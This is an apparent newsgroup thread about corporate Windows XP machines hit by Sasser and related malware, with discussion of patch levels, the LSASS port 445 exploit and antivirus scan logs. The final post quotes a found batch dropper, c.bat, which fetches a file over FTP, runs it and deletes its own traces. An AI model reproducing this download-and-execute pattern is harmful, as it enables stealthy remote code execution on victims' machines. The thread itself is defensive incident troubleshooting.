Sasser: oldie but goodie

[Duh_OZ]

Had two dead motherboards (bad batch of Dell GX270s) replaced today
and both machins got hit with the Sasser virus. Guess I better get a
firewall to protect me from the corporate firewall? Tech did the
work so didn't have the pleasure with dealing with it.

I tried to check on windoze updates (running XP) on both the new
motherboard machine and an old one. Friigen computers can't even
connect to the update page. What a system LOL. Another box I am
currently using the multi-av tool, just to be sure all is okay :0)

 

[David H. Lipman]

From: "Duh_OZ" <[email protected]>

| Had two dead motherboards (bad batch of Dell GX270s) replaced today
| and both machins got hit with the Sasser virus. Guess I better get a
| firewall to protect me from the corporate firewall? Tech did the
| work so didn't have the pleasure with dealing with it.
|
| I tried to check on windoze updates (running XP) on both the new
| motherboard machine and an old one. Friigen computers can't even
| connect to the update page. What a system LOL. Another box I am
| currently using the multi-av tool, just to be sure all is okay :0)

Ozzy:

Just need to know...

Is this TRULY a Sasser worm or was it another worm that was using the buffer overflow
explotation in LSASS via TCP port 445 ?

 

[Duh_OZ]

From: "Duh_OZ" <[email protected]>

| Had two dead motherboards (bad batch of Dell GX270s) replaced today
| and both machines got hit with the Sasser virus. Guess I better get a
| firewall to protect me from the corporate firewall? Tech did the
| work so didn't have the pleasure with dealing with it.
|
| I tried to check on windoze updates (running XP) on both the new
| motherboard machine and an old one. Friigen computers can't even
| connect to the update page. What a system LOL. Another box I am
| currently using the multi-av tool, just to be sure all is okay :0)

Ozzy:

Just need to know...

Is this TRULY a Sasser worm or was it another worm that was using the buffer overflow
explotation in LSASS via TCP port 445 ?

--

Alas I wasn't in there to see anything in action but I did see he ran
the Symantec W32.Sasser removal tool (and told me both got hit with
Sasser).

The Multi-AV just finished before I left and a very quick look at the
log showed a Zapchast and a trojan downloader was on the computer
(which have a trend-micro client).

I'll look at the file names and see if they have a match on the other
computer. I *think* one was c.bat(zapchast) in the /system folder.

Now, can I install multi-av on the other computer. I was able to do
it on the one as the tech hadn't signed off (us workers have no
administrative rights on the XP boxes). It's not that I don't trust
big brother to protect me, it's I just don't trust big brother to
protect me LOL.

 

[David H. Lipman]

From: "Duh_OZ" <[email protected]>


| Alas I wasn't in there to see anything in action but I did see he ran
| the Symantec W32.Sasser removal tool (and told me both got hit with
| Sasser).
|
| The Multi-AV just finished before I left and a very quick look at the
| log showed a Zapchast and a trojan downloader was on the computer
| (which have a trend-micro client).
|
| I'll look at the file names and see if they have a match on the other
| computer. I *think* one was c.bat(zapchast) in the /system folder.
|
| Now, can I install multi-av on the other computer. I was able to do
| it on the one as the tech hadn't signed off (us workers have no
| administrative rights on the XP boxes). It's not that I don't trust
| big brother to protect me, it's I just don't trust big brother to
| protect me LOL.
|

The reason why I ask is that the Sasser is pretty much dead and numerous other Internet
worms have added that exploit in their infection vector arsenal.

I'd be interested in seeing those log files from the Multi AV Scanning Tool and you can
install it but under a limited account, have little effectiveness.

 

[Virus Guy]

Had two dead motherboards (bad batch of Dell GX270s) replaced
today and both machins got hit with the Sasser virus.

Let me see if I understand this.

You had 2 Dell machines (new? old?) and they went bad, and you
replaced them with new machines from Dell - or you replaced their
motherboards (but still kept their original hard drives with
everything on it?)

I don't understand the relationship between the motherboard going bad
and getting hit with sasser.

Regardless if these were older (but updated/patched) machines, or if
they were new (with a factory install of XP), wouldn't they in either
case have XP-sp2? If so, isin't SP-2 patched against sasser?

 

[Duh_OZ]

Let me see if I understand this.

You had 2 Dell machines (new? old?) and they went bad, and you
replaced them with new machines from Dell - or you replaced their
motherboards (but still kept their original hard drives with
everything on it?)

I don't understand the relationship between the motherboard going bad
and getting hit with sasser.

Regardless if these were older (but updated/patched) machines, or if
they were new (with a factory install of XP), wouldn't they in either
case have XP-sp2? If so, isn't SP-2 patched against sasser?

===========
New motherboards and the first thing I asked him is how in the frick a
Sasser would hit the machines. He didn't say anything, just said he
was running the removal tool (which hopefully left a log behind).

What's even scarier (IMHO) is if indeed there was a zapchast and a
trojan downloader on the machine that the trend-micro client never
caught.

Not sure about what SP was installed. I assume they did put SP-2 out
there a few years back. I really don't use a big brother machine (the
bonus of being off site) unless I have to reach some servers in which
I need script to get to (hence I have to use an XP box).

 

[Virus Guy]

New motherboards ...

Which means they were rebuit with their old (pre-existing) hard
drives, which means sasser was already on them.

Unless, along with the new motherboards, that a new install of XP was
put on them during the system re-build, which means that either
XP-gold or XP-SP1 was used as the base install, at which point they
would be vulnerable to sasser if they were connected to your internal
LAN prior to or while being updated to SP2.

Most likely your tech was rebuilding the machines with XP-SP1 (aka
XP-2002 version) and had them connected to your internal LAN either by
mistake (or by oversight) during the rebuild, or on purpose to obtain
the SP2 patch via the network.

If your LAN is behind a firewall, then you must have one (or more)
systems on your lan that are infected by sasser (or something else)
and are constantly attempting to spread to other systems via the
sasser exploit mechanism.

Sasser info:

http://en.wikipedia.org/wiki/Sasser_worm

Internet survival time:

http://msmvps.com/blogs/harrywaldron/archive/2005/07/01/56356.aspx

 

[Duh_OZ]

Which means they were rebuit with their old (pre-existing) hard
drives, which means sasser was already on them.

Unless, along with the new motherboards, that a new install of XP was
put on them during the system re-build, which means that either
XP-gold or XP-SP1 was used as the base install, at which point they
would be vulnerable to sasser if they were connected to your internal
LAN prior to or while being updated to SP2.

Most likely your tech was rebuilding the machines with XP-SP1 (aka
XP-2002 version) and had them connected to your internal LAN either by
mistake (or by oversight) during the rebuild, or on purpose to obtain
the SP2 patch via the network.

If your LAN is behind a firewall, then you must have one (or more)
systems on your lan that are infected by sasser (or something else)
and are constantly attempting to spread to other systems via the
sasser exploit mechanism.

Sasser info:

http://en.wikipedia.org/wiki/Sasser_worm

Internet survival time:

http://msmvps.com/blogs/harrywaldron/archive/2005/07/01/56356.aspx

==========
The two machines were used for at least 2 years with no problems so I
know sasser wasn't on them. Oh to have admin rights so I could run
more tests on them ;-(

 

[Virus Guy]

The two machines were used for at least 2 years with no problems
so I know sasser wasn't on them.

But were the drives kept on those systems in their existing condition
during (and after) the motherboard replacement, or was XP re-installed
on them as part of the rebuild?

If the drives were kept "as-is", and if sasser somehow got onto them
while in the hands of the techs, then there's really only 3
explanations:

1) the XP on those drives were not brought up to SP2, and while
connected to the IT dept's LAN they became exposed to and infected by
sasser.

2) the XP on those drives were brought up to at least SP2 (if not all
available patches since and including SP2) but even so then something
new, some new varient of sasser somehow made it onto them, again
while connected to the IT dept's local LAN.

3) Sasser was on them before being serviced by the IT dept.

 

[Duh_OZ]

Update:
========
All the XP boxes are still on SP1, that inludes the one the tech
didn't have to work on.

The file ID'ed as a zapchast (/system32/c.bat) (I typed in /system
earlier) has:
@echo off
ftp -n -v -s:.pif
wdrk32.exe
del .pif
del /F c.bat
exit /y

The wdrk32.exe is a 0 byte file so at some point must have been
cleaned or at least disinfected?

I also have this in the KAV scan log:
c:\WINDOWS\SYSTEM32\PIF~1 infected: Trojan-Downloader.BAT.Ftp.w

The only filename starting with pif was pifmgr.dll and that came up
clean (VT scan).

BTW - c.bat on all the XP boxes, dates: 08/30/2005, 11/16/2005, and
01/27/2006. The one with the 2006 date doesn't have a wdrk32.exe
file out there. I guess there must have been attacks on the system?

PS - said files weren't deleted during the scan, perhaps because I
don't have admin rights?

PSS - don't ask me to boot in safe mode, not allowed to, hell big bro
won't even let you hook up a network printer.